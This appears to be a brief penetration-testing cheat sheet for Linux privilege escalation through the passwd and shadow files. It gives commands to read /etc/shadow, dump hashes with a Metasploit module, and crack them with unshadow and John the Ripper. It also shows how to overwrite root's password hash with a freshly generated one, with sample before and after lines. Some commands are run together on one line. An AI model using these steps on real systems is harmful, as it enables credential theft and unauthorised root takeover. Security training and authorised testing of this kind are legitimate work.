Linux Privilege Escalation [passwd/shadow]
- Escalation
/etc/passwd, /etc/shadow
Obtain a copy of these files to crack root or privileged user passwords.
cat /etc/passwd cat /etc/shadow 2>/dev/null
Metasploit
post/linux/gather/hashdump
Crack
/usr/bin/unshadow /etc/passwd /etc/shadow > /tmp/output.db john /tmp/output.db
Modifiy the password
Password:
$id$salt$hashed
$id
- $1$ is MD5
- $2a$ is Blowfish
- $2y$ is Blowfish
- $5$ is SHA-256
- $6$ is SHA-512
Before:
root:$6$RIgrVboA$HDaB29xvtkw6U/Mzq4qOHH2KHB1kIR0ezFyjL75DszasVFwznrsWcc1Tu5E2K4FA7/Nv8oje0c.bljjnn6FMF1:17673:0:99999:7:::
Generate password:
mkpasswd -m sha-512 -S herethesalt -s Mot de passe : Passw0rd123!! $6$herethesalt$FQtxbL4NRb.WG5MVz/SGj46uMI8tfksdu5zfgDNJ0So3fUFkJkMrBPIRNDralwdvvLXn3v/UX6NXzcFualgyU0
After:
root:$6$herethesalt$FQtxbL4NRb.WG5MVz/SGj46uMI8tfksdu5zfgDNJ0So3fUFkJkMrBPIRNDralwdvvLXn3v/UX6NXzcFualgyU0:17673:0:99999:7:::